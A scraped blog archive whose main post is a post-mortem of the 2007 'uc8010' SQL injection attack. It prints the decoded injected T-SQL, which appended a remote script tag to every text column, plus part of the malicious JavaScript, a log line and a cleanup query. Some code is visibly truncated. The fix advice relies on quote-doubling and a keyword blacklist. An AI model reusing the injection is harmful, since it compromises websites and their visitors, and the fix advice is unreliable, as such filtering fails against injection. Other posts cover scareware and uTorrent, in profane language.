Microsoft issues advice on SQL injection attacks

Microsoft is alerting customers to several tools that could bolster Web application development in the wake of a rising number of SQL injection attacks targeting faulty code in websites.

This includes that uc8010 attack which was launched around 28 December 2007. (see here and here for the lowdown on uc8010.

For the record, the attack is about poor programming (or lazy programming at any rate), and Microsoft are keen to point out that:

Is this a security vulnerability that requires Microsoft to issue a security update?
No. Any Web application code that has followed generally accepted best practices for security is significantly less susceptible to the SQL injection attack. Although this is not a security vulnerability, this advisory was issued to provide additional warning and assistance for administrators with vulnerable sites.

Microsoft Security Advisory (954462) Rise in SQL Injection Attacks Exploiting Unverified User Data Input

For those of you who have been recently hit by an SQL injection attack here are some useful resources that I have found:

What do to do if you do not have a backed up copy of your database before the SQL injection attack has code which *may* reverse the SQL injection attack

This is the crucial piece of code which could save your bacon:

update ['+@T+'] set ['+@C+'] = left(
       convert(varchar(8000), ['+@C+']),
       len(convert(varchar(8000), ['+@C+'])) - 6 -
       reverse(convert(varchar(8000), ['+@C+']))))
     where ['+@C+'] like ''%<script%</script>''
more than likely you will have to modify it for your specific attack. Please check the for full details.


Cannot login to

Am I the only person in the world that cannot login to

I know my username and password are okay, because under some circumstances I authenticate ok. Their forums don’t mention it.  So is it just me? If you have the same problem, please let me know.

(When I enter my login name and password and hit “come on in”, I get dumped to

Phah maybe it will be okay tomorrow. I’m using Firefox 3.0.1. They upgraded the site recently, but I can’t believe they broke the login??

uc8010 sql injection attack: the facts, more info and post mortem

I posted this when my website got hacked. Within hours thanks to several clever guys,  the whole thing was completely deconstructed with hard facts and code. Thanks to all those that contributed their information, it really helped me and many others out there.

This post is a summary of the comments spawned by my original post. If I forgot something important let me know.

Also check out:

How it was done

SQL injection through via unescaped querystring variables.

We think they looked and tried several query string variables (like id, by, filter, etc)

Here is the code they injected (gotten from someone’s logfiles, and slightly tidied)

2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;
0350029002C00400043002000'. HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248

The actual SQL injected looks like this (decoded this looks like

DECLARE @T varchar(255),@C varchar(255)DECLARE Table_Cursor
CURSOR FOR select, from
 sysobjects a,
 syscolumns b
 and a.xtype='u'
 and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''''')
  CLOSE Table_Cursor

How to find it exactly how it happened to you

Try this in the command prompt on your logfiles:
find "0x4400450043" ex071228.log
find "0x4400450043" ex071229.log
find "0x4400450043" ex071230.log

How to fix

Make sure you escape your variables to protect against SQL injection.

In this case (MS SQL Server), you should do (something like) this:

string safer_id = Request.QueryString["id"].Replace("'","''");

By the looks of it ‘CAST(‘ and ‘EXEC(‘ look like good things to disallow too. More than likely you should restrict the length of the querystrings too, so something like the below can’t really hurt.

string safer = Request.QueryString["id"].Replace("'","''");
if (safer .Length > 128) safer = safer.Substring(0,127);
safer = safer.Replace("CAST(","NOCAST](");
safer = safer.Replace("'EXEC(","NOEXEC](");

These are not fool proof(*) and you should use STORED PROCEDURES in future (I know it is much more work!).

What did it do?

Basically the code injected into your database found every varchar and text field and appended the string:

<script src=http://?></script>

The code for 0.js looks like:

function setCookie(name,value)
var Days = 1;var exp = new Date();
exp.setTime(exp.getTime() + Days*30*60*1000);
document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
function getCookie(name)
var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
if(arr != null)
return unescape(arr[2]);
return null;

It is malicious: the point

According to websmithrob this code is malicious and hidden in there is an attack known as the EXPL_REALPLAY.H
or RealPlayer Exploit (read more about it here)

Microsoft issue security advisory

uc8010 is an SQL injection attack

02 January 2008
original post: a plea for help

I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.

As far as I can tell, the attack inserts <script src=http://?></script> into all varchar and text fields in your SQL database.

For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.

07 January 2008
update on uc8010(dot)com

The exploit has been exposed and described (see the comments below; very, very informative, or go straight to the post-mortem). Below you can find out HOW they did it and WHAT it did. There is no magic fix, you will most likely have to restore your data from a backup, and to prevent further attacks you should escape all querystring variables coming into your database.
Thanks very much to the guys who posted their findings here! Much appreciated.

The attack *is* malicious, and the potential payload is described here (or this

Also watch out for ( which appears to be up to similiar tricks.

When is a trojan not a trojan:

A non-technical friend of mine recently phoned me up to say he had been infected by a virus.  His home page was hi-jacked and he was pretty worried. The infection was proudly proclaimed to be by  According to several sources [of dubious accuracy]  this is very serious. is dangerous toolbar and comes from very dangerous trojan zlob. It hijack your homepage and displays fake warning message to download the another fake spyware applications… If your computer is infected by hijacker then it is very dangerous for your computer.


Note how many times they say dangerous. Note how poor the English is. Note how childishly they warn you of the impending doom. Ooooh this must be bad. I want my {mommy | blanket | cigarettes | pillow} (delete as appropriate)

What are the symptoms?

User’s homepage is changed to or to other unfamiliar websites. Warning messages such as “Virus Alert”, “Your Computer is Infected”, “Security Alert” Trojan-Spy.win32@mx or Spyware.Cyberlog-X infections are displayed.

You even get a warning that something has happened.

The art of deception: dead?

Well that’s all very interesting, but if I were seriously writing a trojan, would I shout so loudly that I had invaded your machine? (I saw Troy, and I don’t remember the Spartans (holding megaphones) riding the wooden horse into Troy , shouting YOUR DEFENSES HAVE BEEN BREACHED). In fact why bother with the wooden horse in the first place?Morons.

No. More likely this is what I think should be called “asshole-ware”. Why would someone announce that you were ill, could it be so that they could sell you medicine?

Your machine probably is infected, it may even be a real trojan, but the real catch, is they get you to pay $25 to remove the infection. Its a real real dumb idea, but it probably works.

A real trojan is about stealth, it doesn’t announce that it is dangerous.

It’s extremely funny, because they warn you of:

Very High Risk   –  Extremely dangerous Spyware. Uses stealth installation, randomly named entries and has the capability to self update or Restore after incomplete removal. Very hard to remove manually. Removing by free software or Re-Name the Dll file of cannot decrease the Privacy Risk, because it uses stealth installation method

I like anything which uses stealth and then warns me that it is using steatlth. Is the art of deception truly dead? Was the Cold War all for nothing? Fuckwits.

We have a cure

You can use to clean your machine. Its free. Its safe. Its well-known. This is a reputable product, and you can download it from A safe place to get stuff like this.

If you gonna lie, make it big


The key to note is that the answer is always the same, and specific recommendation the some no-brand spyware tool. Surprising that they never suggest McAfee or Symantec etc.

Appendix of delusion

This site is probably linked to the idiot mastermind idiot of this scam: where they list their other scams.

 Latest Hijackers List  More lies:


Old Hijackers List Older lies:


utorrent 1.7.x banned or broken

I dunno what happened, but it seems to me that uTorrent 1.7.x is broken and is being banned by several trackers. There are several VERY long threads at

Even the wiki has an entry under the headline Major Bugs. For posterity it currently reads (I suspect this will get removed from the post very soon).

Major bugs
On July 21, 2007 µTorrent version 1.7.2 was released which fixed two bugs that had caused earlier 1.7 versions to be banned on a variety of trackers. The bugs in question could cause wrong stats to be reported both intentionally and unintentional. The first bug was solved in version 1.7.1 and the second in 1.7.2[16]. Although rumors spread that these µTorrent versions also reported personal info to a unknown destination (possibly the RIAA or MPAA) this has not been proven.

The solution is pretty obvious:

There is a bigger issue here, and it concerns the survival of P2P, will our own paranoia about the MPAA / RIAA  force P2P out of use. Are they spreading the rumors, if they are it is certainly the best weapon they have against P2P. If its just paranoia, well that’s pretty sad. uTorrent, is one of the finest pieces of freeware ever, as essential as WinZip ever was. So let’s not ruin a good thing.

Why nothing you do will ever make a difference

Who was the Time “Person of the Year” in 2006? You’ll never believe it, no, you wouldn’t believe it if I told you, it was you (this is for real, not a “joke”).

How quaint? “You control the Information Age. Welcome to your world.” Who the fuck writes shit like this. Who the fuck believes it. Many do. Writing about holidays in the sun and polka dot bikinis.

No one cares about what you have to say.

You must have realised, after writing over 4,458 posts, and amassing 350 comments and 580,876 views, and 7.5 million page impressions, after building your pathetic “brand online“, you are #1 with a bullet in Technorati, you earn £0.53 a day from Google Adwords. What a success story you are.

You have a Page Rank of 4!

Well done, but guess what. Nothing you do ONLINE will ever make a difference. Turn it off, if you want to be noticed, go have a crap in the middle of the street, that works (you’ld be about £0.53p a day worse off though).